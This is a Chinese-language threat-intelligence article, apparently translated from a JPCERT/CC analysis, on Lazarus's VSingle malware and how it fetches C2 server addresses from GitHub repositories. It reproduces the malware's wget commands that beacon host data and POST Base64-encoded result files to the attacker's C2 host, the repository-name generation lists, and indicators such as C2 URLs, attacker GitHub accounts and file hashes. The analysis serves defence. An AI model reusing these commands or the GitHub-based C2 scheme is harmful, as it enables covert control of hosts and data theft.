关键词
C2服务器、VSingle、恶意软件
某些种类的恶意软件使用 DGA、混淆目标信息或包含虚假 C2 服务器信息的方法来隐藏原始 C2 服务器。最近,Lazarus VSingle使用的恶意软件已完成更新,它可以从 GitHub 检索 C2 服务器信息。
VSingle拥有三个硬编码的C2服务器,当它无法从其中获取数据时,恶意软件会访问Github来获取新的C2服务器。具体操作流程如图1。
图1:VSingle操作流程
第一次通信用于发送如下数据。
https://mantis.westlinks.net/api/soap/mc_enum.php?uid=[ランダムな数字列]&upw=[Base64文字列]其中,参数uid包含主机名、内核版本号和八进制IP地址组合的哈希值;参数upw包含了“[IP 地址]|30.0|12b”的 Base64 编码字符串。
C2服务器对上述请求的响应会被存储在以下目录中。
/tmp/.sess_%08x该响应<contents>部分的数据为AES密钥、IV数据和Base64+RC4后的命令。
通信访问的GitHub仓库地址并非固定而是动态生成的。以下是访问的URL的样式。
https://raw.githubusercontent.com/%s/%s/master/README.de可从以下列表中随机选取字符串+随机的字符串组成用户名和仓库名。
| 用户名 | 仓库名 |
| gar3ia | Arcan3 |
| wo0d | Wr0te |
| tr3e | after |
| lucky | luxuryboy |
| l0ve | pnpgather |
| v0siej | happyv1m |
| e0vvsje | laz3rpik |
| polaris | d0ta |
| grav1ty | Dronek |
| w1inter | Panda3 |
| summer | cpsponso |
| ggo0dlluck |
攻击者使用的GitHub仓库会在<videolink1>标签中引入一个URL,如图2所示。恶意代码会从仓库中获取此URL并建立连接。附录A列举了JPCERT/CC 确认了的攻击者使用的 GitHub 存储库。
图2:攻击者使用GitHub仓库的实例
当前版本的VSingle使用wget命令和C2服务器建立连接,而以往的版本则使用系统调用。图3显示了用于执行wget命令的部分代码。(Windows 操作系统上的 Vsingle 不包含此更新,并且使用 Windows API,而不是 wget 命令。)
图3:执行命令wget的部分代码
虽然大多数的恶意软件使用系统调用和 API 与 C2 服务器通信,但 VSingle 执行 wget 命令的方式显得格外大胆,因为该方式较容易留下痕迹。此外,通信结果始终保存在文件中。在实际通信过程中,会执行以下命令。
sh -c "wget -t 1 --server-response --no-check-certificate --user-agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.24 Safari/537.36" "https://mantis.westlinks.net/api/soap/mc_enum.php?uid=15022694&upw=MTkyLjE2OC4yLjI0fDMwLjB8MTJi" -O /tmp/.sess_7b00cf8e 2>&1 | awk '/^ HTTP/{print $2}'"对于命令执行结果,保存执行结果的文件(/tmp/.sess_%04x)将使用Base64进行编码,并通过HTTP POST通信发送,如下所示。
sh -c "wget -t 1 --server-response --no-check-certificate --post-data="uid=15022694&fipng=`base64 /tmp/.sess_%04x`" --user-agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.24 Safari/537.36" "https://mantis.westlinks.net/api/soap/mc_enum.php?uid=15022694&jsid=[AES Key, IV]" -O /tmp/.sess_7b00cf8e 2>&1 | awk '/^ HTTP/{print $2}'"字列]攻击者通常篡改合法的web服务器或使用合法的云服务来隐藏与C2服务器的通信。考虑到很难从日志中检测到这类恶意软件,作者建议采取类似限制用途有限的服务器的可访问地址的方法作为对策。
| 指标1:攻击者使用的邮箱列表(具体邮箱列表请点击阅读原文) |
|
| https://github.com/bgrav1ty13j/bPanda3
https://github.com/fwo0d17n/fWr0te https://github.com/glucky18p/gluxuryboy https://github.com/gf00t18p/gpick/ https://github.com/jv0siej21g/jlaz3rpi |
|
| 指标2:攻击者使用的C2服务器 |
|
|
https://[man]tis.westlinks.net/api/soap/mc_enum.php https://[www].shipshorejob.com/ckeditor/samples/samples.php http://[crm].vncgroup.com/cats/scripts/sphinxview.php https://[ou]green.com/zone https://[tec]nojournals.com/general https://[semi]conductboard.com/xcror https://[blue]dragon.com/login https://[tec]nojournals.com/pres |
|
| 指标3:恶意代码哈希值 |
|
|
199ba618efc6af9280c5abd86c09cdf2d475c09c8c7ffc393a35c3d70277aed1 2eb16dbc1097a590f07787ab285a013f5fe235287cb4fb948d4f9cce9efa5dbc 414ed95d14964477bebf86dced0306714c497cde14dede67b0c1425ce451d3d |
END
编辑|王咏珊
审校|何双泽、金矢
本文为CNTIC编译整理,不代表本公众号观点,转载请保留出处与链接。联系信息进入公众号后点击“关于我们”可见。
原文始发于微信公众号(国家网络威胁情报共享开放平台):从 GitHub 获取 C2 服务器信息的 VSingle 恶意软件
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论